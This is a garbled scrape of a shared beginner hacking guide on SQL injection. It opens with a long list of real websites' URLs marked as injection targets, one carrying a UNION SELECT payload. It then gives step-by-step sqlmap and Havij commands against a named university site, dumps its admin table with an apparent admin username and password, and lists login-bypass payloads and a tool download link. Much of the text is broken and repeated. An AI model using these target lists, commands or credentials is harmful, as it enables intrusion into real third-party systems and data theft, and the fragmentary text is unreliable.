http://slantmagazine.com/giveaway_detail.php?id=2'
http://shohomes.com/gallery.php?id=10'
http://senl.com/nav/artikel_info.php?id=1388'
http://www.newlife.co.uk/show.php?id=592'
http://www.thecompletepianist.com/material.php?id=7'
https://www.camillushouse.org/news_center/news_detail.php?ID=78'
http://www.liquidafrica.com/newsdetail.php?id=1246'
http://dvdmaniacs.net/review.php?id=974'
http://www.msmedicalsystems.com.br/ecommerce/product_info.php?id_produto=221'
http://www.allnations.net/equipment/prodinfo.php?ID=235'
http://www.neilprydemaui.com/category.php?id=6'
http://www.atitelemetry.com/viewapp.php?id=7'
http://www.dynamicptmichigan.com/news.php?id=22'
http://www.pcofiowa.com/news.php?id=15'
http://www.benlongfineart.com/news.php?id=13'
http://stadiumsportsllc.com/news_view.php?id=20'
http://www.kcl.ac.uk/teares/nmvc/external/contact/staff_page.php?staff_id=747'
http://www.ristorantelarsenale.com/newscat.php?id_newscategory=3'
http://www.galleri-a.no/main.php?id=utstilling&utstillingid=1231337157'
http://www.kcl.ac.uk/teares/nmvc/external/contact/staff_page.php?staff_id=67'
http://www.futuresfins.com/fin-detail.php?id=69'
http://core.materials.ac.uk/search/detail.php?id=1803'
http://wordtheatre.com/events/event.php?id=140'
http://www.pimp-codes.com/preview.php?id=1544'
http://www.shirtsenletters.nl/nav/artikel_info.php?id=1377'
http://www.guitars4you.co.uk/product-detail.php?id=413'
http://www.internationalstudents.org/culture-humor.php?idlv2=39'
http://www.2hgs.com/detail_humor.php?ID=38'
http://www.namcap.net/view_product.php?id=31'
http://www.plagij.at/tran.php?id=1071'
http://www.salon52.ca/academies/curriculum.php?id=174'
http://dailyexhibit.com/theme.php?id=1224'
http://www.sanpantaleo.sardegna.it/shopping.php?ID_STRUTTURA=16'
http://enpi-info.eu/main.php?id=403&id_type=2'
http://mayfairgames.com/game.php?id=212'
http://www.hplus.sk/title.php?id=27'
http://tattoosbybryan.com/showimg.php?id=52'
http://www.runningmyraces.com/event.php?id=1870'
http://www.pialombardia4.it/newscat.php?id_newscategory=3'
http://www.inkprints.com/php/productlist/productitem.php?id=1459'
http://www.wcac.org/show.php?id=1'
http://www.djinsure.com/faq/viewFAQ.php?id=8'
http://www.hypetrading.com/productinfo.php?id=285'
http://greyhenpress.com/news.php?id=4'
http://www.gielighting.com/ang/_produit.php?id_cat=3'
http://www.intech-tunisia.com/ang/produit.php?id_cat1=3&id_cat=1'
http://www.intech-tunisia.com/ang/produit.php?id_cat1=2&id_cat=1'
http://www.niesr.ac.uk/staff/staffdetail.php?StaffID=226'
http://www.medpharma-ae.com/showimg.php?id=160'
http://www.clickautographs.com/detail.php?id=972'
http://www.buzzylinhart.com/news-view.php?id=18'
http://www.ma-maas.nl/prodDetail.php?id_prd=63'
http://www.mygoodact.com/collectiondetailperson.php?id=54'
http://www.sigmaspa.com/web/prod_detail.php?ID=225'
http://www.broderna-anderssons.se/prod_detail.php?id=109'
http://queensfashion-paris.fr/ang/produit.php?id=23'
http://cornthwaites.co.uk/viewproduct.php?id=439&catid=6'
http://www.seanscottphotography.com.au/shop_category.php?id=2'
http://www.webcommerce.insee.fr/fiche-produit.php?id_produit=2327'
http://www.macmahonphoto.fr/produit.php?id=232&table=H%E9liopan'
http://www.busaccagallery.com/item_info.php?id=2756'
http://www.areyoureadytoorder.co.uk/review.php?id=251'
http://www.y2neil.com/reviews/review.php?id=17'
http://www.dellorto.fr/details-produit.php?id_produit=2042'
http://weddingdressmarket.com/info.php?id=7413'
http://www.biclopsgames.com/game.php?id=1'
http://byeu.org/photos/viewphoto.php?ID=189'
http://www.lifedesigns.org/viewproduct.php?id=92'
http://www.medpharma-ae.com/showpost.php?id=68'
http://www.svasweb.org/news.php?id=59'
http://old.brownsvilleherald.com/opinions.php?id=0'
http://www.cupid.biz/support/opinions.php?id=61'
http://www.armorysq.org/main/shopping.php?id=157'
http://www.babycareadvice.com/babycare/general_help/article.php?id=48'
http://ux.brookdalecc.edu/fac/tlc/fac/tlc_blog_post.php?id=11'
http://www.mamalibro.com/pagines/llibre_opinions.php?id=9788434237872'
http://www.caiguoqiang.com/project_detail.php?id=196'
http://www.cometantenna.com/newPro_detail.php?ID=234'
http://perkins.pvt.k12.ma.us/museum/section.php?id=214'
http://wwww.newlife.co.uk/show.php?id=107'
http://www.totemcreation.fr/produits/theme.php?idtheme=797&idrub=100'
http://www.tourisme-boulognesurmer.com/shopping.php?id=36'
http://www.chinafashiontang.com/productinfo.php?id=627'
http://www.emaxxtech.com/view_faq.php?id=44'
http://alliemsalon.com/news_full.php?id=16'
http://www.dracoders.com/games.php?id=14'
http://www.digitaldickens.com/section.php?id=6'
http://www.equality-ne.co.uk/readnews.php?id=3728'
http://www.traikos.us/trends_opinions.php?id=5'
http://www.bulletproofautomotive.com/catalog-detail.php?ID=7265'
http://www.ec21th.com/productinfo.php?id=194'
http://www.hbztrade.com/productinfo.php?id=273'
http://www.macmahonphoto.fr/produit.php?id=196&table=H%C3%A9liopan'
http://www.spraywaysingapore.com/proddetail.php?ID=17'
http://drugandalcoholeducationservices.co.uk/news_detail.php?id=1'
http://propartsllc.com/prodDetail.php?ID=596'
http://www.melbournefineart.com.au/gallery.php?id=18'
http://www.robotech.com/community/forum/messages.php?id=23'
http://www.llangollen-railway.co.uk/event.php?id=80'
http://www.shop-gun.fr/product.php?id_product=510'
http://www.hebron.com/english/gallery.php?id=190'
http://courtnews.co.nz/story.php?id=1660'
http://www.backbiomass.co.uk/newsroom-story.php?id=19'
http://www.srilankatravelcentre.com/pages.php?id=47'
http://ethansreview.com/website.php?id=1'
http://www.austells.net/news/news_full.php?id=35'
http://www.ebambi.com/profile_view.php?id=100000008'
http://www.cabinetglass.com/preview.php?id=352'
http://www.masshist.org/database/doc-viewer.php?item_id=99'
http://www.evene.fr/forum/theme.php?id_theme=13'
http://www.shop-gun.fr/category.php?id_category=13'
http://www.walkamilepeterborough.com/participant.php?id=94'
http://www.prespec-consulting.com/theme/theme.php?id_theme=7'
http://www.eia.org.uk/view.php?id=948'
http://www.rockthewok.com/readnews.php?id=24'
http://www.sghgate.net/productinfo.php?id=627'
http://mikesmit.com/show_post.php?id=1175207880'
http://www.fspacerpg.com/proddetail.php?ID=FSPEB103'
http://www.narkissosshavingoil.com/product/item.php?ID=1'
http://www.oiwsba.com/oiwsba/memberinfo.php?id=54'
http://www.bayareaassn.com/memberinfo.php?id=7'
http://association.cqu.edu.au/cqusa_faq/php/view-faq.php?id=101'
http://staff-driver.net/page.php?file=vacansys&vacstart=10'
http://www.bengaldens.com/detail_all_post.php?id=78'
http://www.suagacollection.com/photo-gallery.php?id=1'
http://www.srilankatravelcentre.com/pages.php?id=49'
http://www.motorxchange.fr/destockages.php?id_destockage=123'
http://www.gocontempo.com/pages.php?id=2'
http://www.aquasignal.info/us/cms/htdocs/main.php?id=209'
http://www.discoverypartnerships.com/register/curriculum.php?id=44'
http://www.ghnats.org/pages.php?id=2'
http://www.worldmusicinstitute.org/event.php?id=906'
http://wminyc.org/event.php?id=1072'
http://www.arcana.com/view_title.php?id=189'
http://www.canalchat.com/transcript.php?id_alaffiche=1013'
http://www.canalchat.com/transcript.php?id_alaffiche=783'
http://cloneemotorcentre.ie/faq2.php?id=15'
http://komagan.net/readnews.php?id=5'
http://fpchurch.org.uk/News/view.php?id=26'
http://sflcn.com/story.php?id=9826'
http://www.oldtimephotos.org/gallery.php?id=11'
http://www.latintourdimensions.com/overview/product_detail.php?id=352'
http://www.latintourdimensions.com/overview/product_detail.php?id=86'
http://www.uslandandhome.com/detail.php?id=2649'
http://www.ndc.ps/main.php?id=9'
http://www.falltvpreview.com/show.php?id=1037'
http://www.timeref.com/myperson.php?id=1752'
http://www.trumanlibrary.org/photographs/view.php?id=392'
http://perkins.pvt.k12.ma.us/museum/section.php?id=213'
http://ohr.edu/ask_db/ask_main.php?id_number=222'
http://www.torinofilmlab.it/person.php?id=344'
http://www.torinofilmlab.it/person.php?id=338'
http://ce.et.tudelft.nl/person.php?id=926'
http://www.driftsurfing.eu/surf_article.php?id=1880'
http://www.emaxxtech.com/view_faq.php?id=34'
http://www.stonemarket.co.uk/section.php?id=3'
http://www.micronanosystems.co.uk/nano_news_full.php?id=72544'
http://www.brock.ac.uk/news/news/detail.php?id=000178'
http://www.brock.ac.uk/news/news/detail.php?id=000189'
http://www.thedockyard.co.uk/photo_gallery_pop.php?id=43'
http://www.drinksontario.com/memberinfo.php?id=70'
http://www.hebron.com/english/gallery.php?id=170'
http://www.evene.fr/forum/theme.php?id_theme=19'
http://hoohila.stanford.edu/firingline/displayTranscript.php?programID=418'
http://www.irishart.com/dispgallery.php?id=518'
http://linkinthebox.com/productinfo.php?id=109'
http://www.wall4me.com/uk/page_produit.php?id=16'
http://www.carhs.de/en/company/news/full.php?Id=202'
http://www.austells.net/news/news_full.php?id=30'
http://www.humormillnews.com/hmill/read.php?id=13'
http://lemhiweb.com/news.php?id=36'
http://www.boys.njpanthers.com/preview.php?id=24'
http://www.fasl.ch/activites/tous_annonces_ages.php?idcentre'
http://en.swfplay.net/game.php?id=104'
http://www.gp.org/speakers/detail.php?ID=29'
http://www.polkatheatre.com/event.php?id=43'
http://brml.technion.ac.il/publications.php?id=7'
http://www.gordonsmithguitars.co.uk/products/category.php?id=2'
http://www.18eighty.com/os_view_product.php?id=37'
http://www.octaviahousing.org.uk/about-us/news/view.php?Id=233'
http://www.tecnologi.net/wp/curriculum.php?id=237'
http://www.worldstyling.com/web/product_detail.php?id=95'
http://cherokeeguitar.com/product-detail.php?id=16'
http://www.westcliffepublishers.com/detail.php?id=345'
http://www.justcampagne.fr/en/produit.php?id_cat=5'
http://www.theshootinggamepage.com/displaygames.php?id=32'
http://bryanco.com/news_post.php?id=26'
http://weekend.od.ua/news_full.php?id=1531'
http://www.kusuri.co.uk/view_product.php?id=245'
http://www.kusuri.co.uk/view_product.php?id=242'
http://www.charot.com/produit.php?id=20'
http://www.nicolasmarquis.com/site/produit.php?id=%2733'
http://www.indianewsheadlines.com/post.php?id=8006'
http://www.manka-creations.com/AG/produit.php?ID_produits=4'
http://www.carldavey.co.uk/product.php?id=2'
http://www.actipack.fr/actipack/lang_EN/fiche_produit.php?id=180'
http://www.walkamilepeterborough.com/participant.php?id=95'
http://www.gielighting.com/ang/_produit.php?id_cat=7'
http://www.manka-creations.com/AG/produit.php?ID_produits=28'
http://www.wardrobesystems.co.uk/preview.php?id=365'
http://www.planetbollywood.com/displayArticle.php?id=s011911120004'
http://www.peabody.uga.edu/news/event.php?id=59'
http://snakedancecondos.com/pages.php?id=10'
http://www.zoolyshop.com/productinfo.php?id=201'
http://mx5.brighton-rock.net/BandInfo.php?ID=315'
http://mx5.brighton-rock.net/BandInfo.php?ID=643'
http://www.skbcases.com/industrial/products/prod-detail.php?id=235'
http://elmercadohispano.com/prod_detail.php?ID=284" onclick="sa_mpTC(event, this); return
false;'
http://bulacandeped.org/viewannounce.php?id=4'
http://www.retroinferno.com/viewproduct.php?id=235'
http://brml.technion.ac.il/publications.php?id=6'
http://dufieux-industrie.com/en/fiche_type_produit.php?id=15'
http://www.lindbergbros.com/page/post.php?id=365'
http://bryanco.com/news_post.php?id=23'
http://www.kevinmurphy.com.au/products/styling_productdetail.php?id=17'
http://www.amoryssolicitors.com/main.php?ID=1'
http://boxofficebuz.com/news_full.php?id=36'
http://leavenworth.org/modules/pages/index.php?pageid=1'
http://www.greenkettle.co.uk/view.php?id=%277'
http://www.discoverypartnerships.com/register/curriculum.php?id=49'
http://www.merseyfencing.co.uk/section.php?id=Timber-Fence-Panels'
http://www.tanthrough.com/proddetail.php?id=809790'
http://www.inhealthnw.com/story.php?id=143'
http://www.saleemcarpets.com/prod_detail.php?ID=10'
http://kornerstore.net/ks_proddetail.php?ID=180'
http://www.widescreenreview.com/news_detail.php?id=19267'
http://dpanswers.com/roztr/content_show.php?id=86'
http://www.cryptoseries.fr/Fiches/fiche-serie_personnages.php?id=71'
http://www.hypetrading.com/productinfo.php?id=491'
http://www.mikesmit.com/show_post.php?id=1141826580'
http://www.charot.com/produit.php?id=13'
http://www.coedllandegla.com/download.php?id=2'
http://ce.et.tudelft.nl/publications.php?id=1755'
http://www.mediflight.com.au/publications.php?id=75'
http://english.euyou.com/shopping.php?id=25&countryid=7'
http://rainydaymv.com/toys/games-toys-all-ages.php?id=35'
http://www.uni-saarland.de/fak3/fr36/sites/institut/person.php?id=1'
http://www.medix.com.hr/aboutbook.php?id=33'
http://www.australianewsonline.com/post.php?id=9960'
http://www.dundeetrainingstable.com/news-full.php?ID=16'
http://www.actforkids.com.au/news_full.php?id=134'
http://www.youngatheartministries.com/prod_detail.php?id=3'
http://www.communityinclusion.org/staff.php?staff_id=21'
http://www.flyfishinginmaine.com/story.php?id=58'
http://www.retroinferno.com/viewproduct.php?id=700'
http://capeyouthadventures.co.za/main.php?Id=6'
http://www.sflcn.com/story.php?id=6946'
http://www.edwardsymmons.com/pages/news_story.php?id=171'
http://www.alte.org/news/newsitem.php?newsID=209'
http://www.iol.umd.edu/People/person.php?id=tweyrauch'
http://www.cornerstone.org.uk/publications.php?id=newsletters'
http://lucklyinthebox.com/productinfo.php?id=1155'
http://www.coastalengineering.com/staff_pop.php?id=10'
http://www.prespec-consulting.com/theme/theme.php?id_theme=8'
http://www.aspasiabooks.com/News_View.php?ID=37'
http://www.newmasterplanning.com/project_main.php?id=16'
http://www.biblioteca-ua.com/select_biblio.php?id=1599+union+select+1%2Cconcat%28table_name%2C0x3a%2Ccolumn_name%2C0x3a%2Ctab
le_sc
hema%29%2C3%2C4%2C5+from+information_schema.columns+where+column_name+LIKE
+CHAR% 2837%2C+112%2C+97%2C+115%2C+37%29--'
http://biblioteca-ua.com/select_biblio.php?id=1599" onclick="sa_mpTC(event, this); return
false;'
http://yoga.ge/pages/theme.php?id=192%E1%83%99%E1%83%90%E1%83%A0%E1%83%9
2%E1%83%98%E1%83%90'
http://www.lawetalnews.com/post.php?id=144'
http://www.nu.edu.bd/noticeInfo.php?id=355'
http://www.anchoryachts.com/preview.php?ID=3'
http://www.tecnologi.net/wp/curriculum.php?id=36'
http://www.cryptoseries.fr/Fiches/fiche-serie_personnages.php?id=17'
http://www.f4customs.com/install_pages.php?id=8'
http://www.luimo.org/curriculum.php?id=ST000036'
http://www.thefastshow.com/virtual_show_detail.php?ID=44'
http://boxofficebuz.com/news_full.php?id=57'
http://www.amouage.com/news.php?ID=10'
http://www.indianewsheadlines.com/post.php?id=8049'
http://www.sinclairgroup.com/sinclair_web/person.php?id=104'
http://www.samsungmobilers.ro/post.php?id=143'
http://www.johandemeij.com/post.php?id=223'
http://www.chot.org/pages.php?id=88'
http://riyadhtravel.net/show.php?id=3'
http://iwine.com.hk/product_item.php?id=17'
http://www.dvdholocaust.com/review.php?id=473'
http://computer.ytu.edu.cn/showannounce.php?id=41'
http://www.sinclairgroup.com/sinclair_web/person.php?id=49'
http://arthurpober.com/pages.php?id=15'
http://allnations.net/equipment/prodinfo.php?ID=3'
http://www.towncityrealty.com/info.php?id=25'
http://www.watercampws.uiuc.edu/index.php?menu_item_id=44'
http://www.brighton-rock.net/BandInfo.php?ID=479'
http://www.brighton-rock.net/BandInfo.php?ID=555'
http://www.pokenav.net/blog_post.php?id=1019'
http://www.bohemianchandeliers.co.uk/site_files/prod_detail.php?id=19'
http://capturegis.com/pages.php?id=10'
http://www.saleemcarpets.com/prod_detail.php?ID=57'
http://www.beemabuild.co.uk/view_product.php?id=258'
http://www.coastal-koi.com/view_product.php?id=1393'
http://mapleislandsales.com/product_detail.php?ID=78'
http://www.sigmaspa.com/web/prod_detail.php?ID=216'
http://www.familiscope.ie/main.php?ID=3'
http://biomed.eng.cmu.ac.th/index.php?newsdetail.php&id=63'
http://www.justcampagne.fr/en/produit.php?id_cat=2&id=88&id_coul=12'
http://www.checkersindustrial.com/product.php?id=74'
http://www.craftaustralia.org.au/library/review.php?id=ghost_nets'
http://linkinthebox.com/productinfo.php?id=109'
http://www.guruslodge.com/index.php?topic=6484.0'
http://www.nmtf.co.uk/index.php?id_cpg=1'
http://www.ics.heacademy.ac.uk/publications/book_reviews/full_review.php?id=421'
http://www.wellydiecast.com/product_detail.php?id=1070'
http://www.wellydiecast.com/product_detail.php?id=7'
http://www.humormillnews.com/hmill/read.php?id=13'
http://hoohila.stanford.edu/firingline/displayTranscript.php?programID=418'
http://familynewsabout.com/aboutBook.php?id=3241'
http://www.saumon-fqsa.qc.ca/en/section.php?ID=16'
http://www.traikos.us/trends_opinions.php?id=5'
http://riyadhtravel.net/show.php?id=3'
http://old.brownsvilleherald.com/opinions.php?id=1590'
http://www.zigzagweeklynews.com/opinions.php?ID=6143'
http://www.pcofiowa.com/news.php?id=15'
http://www.faithinplace.org/news.php?ID=58'
http://www.llangollen-railway.co.uk/event.php?id=80'
http://www.fundraisingnetwork.org/cat-Games.php?id=39'
http://www.midlandairmuseum.co.uk/news.php?id=16'
http://www.octaviahousing.org.uk/about-us/news/view.php?Id=233'
http://flatbearconsulting.com/pages.php?id_pag=6'
http://capturegis.com/pages.php?id=10'
http://www.familiscope.ie/main.php?ID=3'
http://www.constructionspares.com/main.php?ID=6'
http://www.theshootinggamepage.com/displaygames.php?id=32'
http://www.punp.edu.ph/main.php?id=33'
http://www.westcliffepublishers.com/detail.php?id=345'
http://www.bombasticlife.com/place/review.php?id=504'
http://www.thecompletepianist.com/material.php?id=7'
http://www.digitaldickens.com/section.php?id=6'
http://www.ec21th.com/productinfo.php?id=194'
http://www.hbztrade.com/productinfo.php?id=273'
http://www.kingslynnarts.co.uk/whatson_event.php?id=46'
http://www.sheridan-uk.com/news_detail.php?id=52'
http://lemhiweb.com/news.php?id=36'
http://www.communityinclusion.org/staff.php?staff_id=21'
http://www.falltvpreview.com/show.php?id=1037'
http://dvdmaniacs.net/review.php?id=974'
http://www.amoryssolicitors.com/main.php?ID=1'
http://ethansreview.com/website.php?id=1'
http://www.drinksontario.com/memberinfo.php?id=70'
http://www.thejewishmuseum.org/site/pages/event.php?id=348'
http://www.ngo-monitor.org/article.php?id=1564'
http://wminyc.org/event.php?id=1072'
http://www.abalar.es/ampliar_material.php?id_material=11'
http://stadiumsportsllc.com/news_view.php?id=20'
http://www.worldmusicinstitute.org/event.php?id=906'
http://baywoodbest.com/listingPop.php?Id=620'
http://www.peabody.uga.edu/news/event.php?id=59'
http://www.waukee.org/event.php?id=19'
http://bulacandeped.org/viewannounce.php?id=4'
http://www.tourisme-boulognesurmer.com/shopping.php?id=36'
http://www.portalararuna.com.br/2011/humor.php?id=10'
http://propartsllc.com/prodDetail.php?ID=596'
http://www.bohemianchandeliers.co.uk/site_files/prod_detail.php?id=16'
http://www.equality-ne.co.uk/readnews.php?id=3728'
http://www.medpharma-ae.com/showpost.php?id=68'
http://www.guitars4you.co.uk/product-detail.php?id=413'
http://www.trumanlibrary.org/photographs/view.php?id=392'
http://www.gocontempo.com/pages.php?id=2'
http://www.fanfics.ru/read.php?id=1515'
http://www.dvdmaniacs.net/review.php?id=318'
http://www.cheap-web-hosting-info.com/hosting_review.php?id=8'
http://gp.org/speakers/detail.php?ID=42'
http://www.konceive.com.au/riverside/investAnnounce.php?id=43'
http://www.valiani.com/computerised_detail.php?ID=1'
http://dailyexhibit.com/theme.php?id=1224'
http://www.atitelemetry.com/viewapp.php?id=7'
http://www.oldtimephotos.org/gallery.php?id=11'
http://shohomes.com/gallery.php?id=10'
http://www.justcampagne.fr/en/produit.php?id_cat=5'
http://www.planetbollywood.com/displayReview.php?id=m101411095354'
http://www.alte.org/news/newsitem.php?newsID=209'
http://www.leadacidbatteryinfo.org/newsdetail.php?id=18'
http://www.suagacollection.com/photo-gallery.php?id=1'
https://www.camillushouse.org/news_center/news_detail.php?ID=78'
http://www.liquidafrica.com/newsdetail.php?id=1246'
http://www.planetbollywood.com/displayArticle.php?id=s011911120004'
http://www.aquasignal.info/us/cms/htdocs/main.php?id=209'
http://www.kudosshowers.co.uk/gallery.php?id=3'
http://ultimatehomedesign.com/news-detail.php?id=312'
http://www.beemabuild.co.uk/view_product.php?id=258'
http://www.whatwhenwhere.ie/event.php?id=382'
http://www.wcac.org/show.php?id=1'
http://www.ebambi.com/profile_view.php?id=100000252'
http://www.polkatheatre.com/event.php?id=43'
http://www.melbournefineart.com.au/gallery.php?id=18'
http://www.uni-saarland.de/fak3/fr36/sites/institut/person.php?id=1'
http://www.techvision.co.uk/news.php?id=45'
http://www.nihonmono.com/prod_detail.php?id=11000384'
http://www.nissi-beach.com/section.php?id=13'
http://asptt.com/running-tour/participant.php?id=14785'
http://www.widescreenreview.com/news_detail.php?id=19267'
http://lucklyinthebox.com/productinfo.php?id=1155'
http://association.cqu.edu.au/cqusa_faq/php/view-faq.php?id=51'
http://www.4wdsystems.com.au/index.php?id=29'
Vuln H1N1 Hacker
SQL Injection Attack Software

SQL Injection
Havij Tool
SQL attack Havij SQL Injection
Tools Download Havij Download
SQL Vuln
Havij Target
Target SQL vunl Analyze
Scann Current Database Table
Table Main Table Main Table

flashin_sparkms Get Table Get table User Table ,
Admin Table Table Admin Table User Table
GET Column
GET Columns Password Column Id column

Get data
Admin ,user ,Id Username .Password

Login page Havij Find Admin
Login page

Havij Pen test
Back Track SQL Map SQL Inject

Back Track SQL Injection
1. SQL Vuln
http://www.hu.edu.pk/viewfaculty.php?id=12
2. BT Terminal cd /pentest/database/sqlmap
3.
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12
-u is the vulnerable url Command
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --dbs

or
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --current-db
--dbs
--current-db
Current database Data Base Name c3recults

Command Database name
Command
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results --tables
-- table Table
Admin Cloumn Command
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin --columns

Name .
Command Admin ,Id ,Password
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin -C

id,passwrd,u_name --dump
Admin user+password
Pen Test Admin acess

Database Name : c3results
No of tables :48
Admin Table Name : admin
admin username : 123_admin_123
admin password : 123_hazara_123
..
Countermeasures From SQL Attack (SQL Attack)

CEH Beginner
Knowledge
REF: Brb (Planet Creator),You Tube,Back Track

Forum,H1n1 (mmcyberdevils),all ItemZ,CEH7,Google
Special Thz to: (G Tone MHU) BHGMyanmar Cyber Army
SQL Injection Video

Sql injection attack Videos
http://www.youtube.com/watch?v=h-9rHTLHJTY
http://www.youtube.com/watch?v=jMQ2wdOmMIA
http://www.youtube.com/watch?v=PB7hWlqTSqs
http://www.youtube.com/topic/QJnLFoEO7Fs/?feature=results_main
http://www.youtube.com/watch?v=bORZlmyDw0s
http://www.youtube.com/watch?v=JqzWPLq7bJY
http://www.youtube.com/watch?v=0z1rt9Y-ON0
http://www.youtube.com/watch?v=qELByGfNJSE
Havij Videos
http://www.youtube.com/watch?v=Qvhdz8yE_po
http://www.youtube.com/watch?v=DMcaqCGHUVc
http://www.youtube.com/watch?v=JdgE7MSsBTc
http://www.youtube.com/watch?v=Ck5bifmAjZk
SQL injection with Back Track Videos
http://www.youtube.com/watch?v=ViezR1Qmcns
http://www.youtube.com/watch?v=hANMjTqFLD8
http://www.youtube.com/watch?v=-F1nBasky6E
http://www.youtube.com/watch?v=2cKJ5l9qYE0
http://www.youtube.com/watch?v=TqvLMWNTBYU
Havij Download :::::::

http://www.mediafire.com/download.php?r3ey1g20q1y69ka
SQL Injection

Video Download Video

Black Attack Cyber Law Educational Purpose Only
Attacking
3thic0kiddi3 (Ethic Kiddie)
www.ethickiddie.blogspot.com
3thic0kiddi3@gmail.com
1.Wifi hacking basic

2.DNN hacking Basic
3.IIS Hacking Basic
4.Network Hacking Basic
5.Loic Tool DDOS Basic
6.SQL Injection Basic

SQL Injection Attack by 3thic0kiddi3

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

SQL Injection Attack by 3thic0kiddi3

Uploaded by

Copyright:

Available Formats

SQL Injection Attack

Myanmar Version for Begineers

SQL Injection Attack For Beginners By 3thic0kiddi3

port scanner sanner port

SQL Injection SQL injection Web development knowledge PHP

Application ... Application Programming Interface (API)

--- - -Site username, password login site content

programmer login User

or '1'='1' password:' or '1'='1'

--- Data --SQL injection bypassing logins DB servers

value 'table1' to a column of data type int.

error ASP, JSP, CGI, PHP web pages

URL parameters login page, search page, feedback

value BYPASSING LOGINS

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in

7 error 6 Columns ...

UNION SELECT ALL statement ..

2,3,4 .. data Columns ...

---MySQL 5 injection-- MySQL version 5.0.90 ... MySQL version 5

MySQL version @@version unhex(hex())

DB table ... tables

... user name password

0x3a ":" hex code

username password ...

reports pnc_article in the error pnc prefix table name pnc

table name user ..

---Site -- Site admin password admin panel

www.site.com/article.php?id=5 UPDATE article SET title='value 1',data='value 2',author='value

www.site.com/article.php?id=5 UNION ALL SELECT

--- MySQL commands ..--ABORT abort the current transaction

ALTER USER change a database user account

DECLARE define a cursor

NOTIFY generate a notification

---------------------------------------------------------------------------------------------------------------- SQL Injection

SQL Error Website

Google Dork For SQL Injection

SQL Error (Vuln)

Vuln H1N1 Hacker

SQL Injection Attack Software

Target SQL vunl Analyze

Scann Current Database Table

Table Main Table Main Table

GET Columns Password Column Id column

Admin ,user ,Id Username .Password

Havij Pen test

Back Track SQL Map SQL Inject

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --dbs

Current database Data Base Name c3recults

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results --tables

Admin Cloumn Command

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin --columns

Command Admin ,Id ,Password

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin -C

Pen Test Admin acess

Countermeasures From SQL Attack (SQL Attack)

REF: Brb (Planet Creator),You Tube,Back Track

SQL Injection Video

Havij Download :::::::

3thic0kiddi3 (Ethic Kiddie)

1.Wifi hacking basic

You might also like